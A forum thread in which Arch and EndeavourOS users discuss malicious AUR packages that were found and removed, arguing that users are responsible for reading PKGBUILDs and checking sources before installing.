In that case, EndeavourOS - or most likely any distro based on Arch - is not the best choice for those users.
Arch’s principals directly contradict this “it should just work without needing to understand how it works” concept:
Whereas many GNU/Linux distributions attempt to be more user-friendly, Arch Linux has always been, and shall always remain user-centric:
The distribution is intended to fill the needs of those contributing to it, rather than trying to appeal to as many users as possible.
It is targeted at the proficient GNU/Linux user, or anyone with a do-it-yourself attitude who is willing to read the documentation, and solve their own problems.
Also:
Arch ships the configuration files provided by upstream with changes limited to distribution-specific issues like adjusting the system file paths. It does not add automation features such as enabling a service simply because the package was installed.
Manjaro attempts to alleviate update issues by delaying and testing package updates for weeks, delivering them in a large update bundle, yet manual intervention by the user is still required periodically.
Something was done they were discovered and removed. What else should we do?
How about accept responsibility for ones own stuff. I mean a few moments of reading would have set off some red flags. Already stated before that Arch is really not meant for the “NEWBIE”,but for those willing to do the WORK.
I don’t think anyone will move away from Arch due to this. It’s always been made clear the risks of using the AUR by the Arch team.
And checking for URLs in the script like this is no different than on Windows and making sure you browse to a legitimate website URL to download and install an exe file. Flatpaks can also have the same vulnerability to this too as anyone can create and upload those and would advise caution with any unofficial flatpak.
I would say the main issue is the mindset when installing programs, many people will find a file online and run it without thought which is a risk.
AUR is safe due to the transparency to see these instructions in advance, check for changes, the uploader, verifying the github repository used for the package is legitimate, commands used, etc.
Sure there are ways the AUR could potentially be improved, but these checks by the user will protect anyone in general with programs on the internet.
Very well done video. Newbs, and maybe even some intermediate users, need to view this. While much of the video is common sense, as we all know, common sense is not necessarily all that common.
@koderOSS If you were wondering why I said that, there’s a post from 8 days ago that already mentioned it and one of the replies shared the same link as you just did again in this topic.
I think only the nOObs… let them go. It’s not supposed to be safe for toddlers - I like it live and dangerous.
This article seems slightly flawed - unless they can verify from whence the upvotes came from “Still, it did get a few upvotes, which suggests at least some users ended up installing it.”…
Actually, it seems more likely that the uploader has a couple of accounts or buddies who can upvote for them - as their other attempts to throw this exact same curl trick into a pkgbuild also came with 6 upvotes.
As before, using Paru or Yay - it’s trivial to check out the DETAILS, and follow the link to the AUR page where you can fully read, select/search links, and investigate the pkgbuild.
